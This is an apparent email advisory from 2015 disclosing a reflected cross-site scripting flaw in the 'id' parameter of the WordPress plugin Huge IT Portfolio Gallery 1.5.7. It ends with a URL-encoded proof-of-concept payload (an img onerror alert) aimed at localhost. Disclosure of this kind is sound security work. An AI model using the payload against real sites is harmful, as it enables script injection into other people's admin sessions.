Subject: Cross-Site Scripting (XSS) in Huge IT Portfolio Gallery 1.5.7

Date: Mon, 24 Aug 2015 11:52:20 +0200

Hello,

Plugin: Huge IT Portfolio Gallery 1.5.7 https://wordpress.org/plugins/portfolio-gallery/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=edit_cat&id=[xss]

Vulnerable parameters: id

Example PHP callstack:

Html_editportfolio [/portfolio-gallery/admin/portfolios_view.php:372]

Verification:

http://localhost/wp-admin/admin.php?page=portfolios_huge_it_portfolio&task=edit_cat&id=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,